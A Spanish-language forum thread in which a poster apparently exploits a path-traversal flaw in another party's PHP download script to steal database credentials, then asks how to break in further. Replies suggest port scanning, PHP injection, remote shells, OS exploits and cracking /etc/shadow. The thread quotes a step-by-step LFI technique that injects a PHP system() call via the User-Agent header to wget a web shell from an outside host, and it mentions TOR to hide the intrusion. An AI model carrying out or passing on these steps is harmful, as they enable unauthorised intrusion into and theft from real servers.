Hola, estoy intentando acceder a una BD SQL. Espero que podáis ayudarme.
POR PASOS:

Entro a la web y encuentro el archivo "descargas.php" con el siguiente codigo:
<?
        $ruta=$HTTP_GET_VARS['dir'];
   
   $enlace = "../directorio/".$ruta;

   header ("Content-Disposition: attachment; filename=".$ruta."\n\n");
   header ("Content-Type: application/octet-stream");
   header ("Content-Length: ".filesize($enlace));
   readfile($enlace);
?>

Con lo cual haciendo:
http://www.servidor.com/descargas.php?dir=../../conectarsql.php

Consigo bajar el código del archivo conectarsql.php:

<?
$dbh=mysql_connect ("localhost", "usuario", "contraseña") or die ('Imposible conectar porque: ' . mysql_error());
mysql_select_db ("basededatos",$dbh);
?>

Ahora ya tengo la base de datos, el usuario y la contraseña.
Hago un ping a www.servidor.com y ya tengo la IP del servidor también.

Y ahora que tengo todo viene la gran pregunta:
¿Cómo me conecto remotamente a esa B.D.?
¿Es posible el acceso remoto a la base de datos SQL?
¿$enlace = "../directorio/".$ruta; todavía me vale para robar algun archivo más que no sea el passwd ni los logs porque no tengo permiso para ello?

Espero que podáis echarme una mano con esto. Gracias

El código indica que el servidor de base de datos es el mismo servidor web, en tal caso sólo bastaría tener en el my.conf el atributo bind-address=127.0.0.1 para que nunca te puedas conectar vía remota..


En todo caso usa nmap para averiguar si la ip que tienes tiene accesible el 3306, y esperemos que siga siendo ese y no lo hayan cambiado sino nos toca buscarlo en los 65535 puertos   

Para acceder a esa base de datos se me ocurre:

- 1, con php-injection
- 1.a algún archivo.php creado por ti para manejar esa BD.
- 1.b alguna forma de obtener shell remota.
- 1.c ver que versión de SO tiene para buscar algun exploit.
- 1.d etc etc etc

- 2 Si el servidor web no hace chroot puedes descargar el /etc/password o /etc/shadow para tratar de crakear la clave del root, aunque parezca imposible muchos admins usan claves fáciles..., luego de eso tratar de acceder via ssh.

-

Dios!

Como es que consigues bajar un archivo .php y ver los datos de conexión.
Necesito info, al parecer soy muy No0b

Claro, no puedes conectarte remotamente, esa falla de seguridad que tiene el servidor es LFI y file disclosure solamente y no puedes obtener los .frm de la base de datos mysql por muy localhost que sea ya que ese directorio tiene permisos por defecto que te van a denegar su lectura por lo tanto no te queda otra que buscar otras vulnerabilidades como para poder hacer inyección SQL y hacer dump a la base de datos o intentarle subir algo para hacer el dump igual.

Gracias a todos por la ayuda.
Tienes razón OHK sería mejor que buscase otras vulnerabilidades, tengo acceso al /etc/passwd y eso me dice bastante de las aplicaciones que tiene instaladas. (y de los usuarios todo menos la contraseña, hay que jod¿¡#$1J&)
También tengo acceso a su version de linux y otros datos interesantes para buscar vulnerabiliades nuevas.

Con LFI solo me queda probar algo similar a esto que encontré en google (para conseguir shell remota como dijo Monkito):
-----------------------------------------
Now let's inject our malicious code in proc/self/environ.How we can do that?We can inject our code in User-Agent HTTP Header.
    Use Tamper Data Addon for Firefox to change the User-Agent.Start Tamper Data in Firefox and request the URL :
    
      www.website.com/view.php?page=../../../../../proc/self/environ
      
     Choose Tamper and in User-Agent filed write the following code :
    
        <?system('wget http://hack-bay.com/Shells/gny.txt -O shell.php');?>
        
    Then submit the request.
    
     Our command will be executed (will download the txt shell from http://hack-bay.com/Shells/gny.txt and will save it as shell.php in the
website directory) through system(), and our shell will be created.If don't work,try exec() because system() can be disabled on the webserver from php.ini.
-------------------------------------------

Después trataré de buscar nuevas vulnerabilidades como dices OHK.

Braulio23, lo del proxy casi que lo dejo como última opción. De todas maneras gracias braulio23, es bueno tener en cuenta todas las posibilidades, y en último caso podría conectarme haciendo un tunel con la red TOR....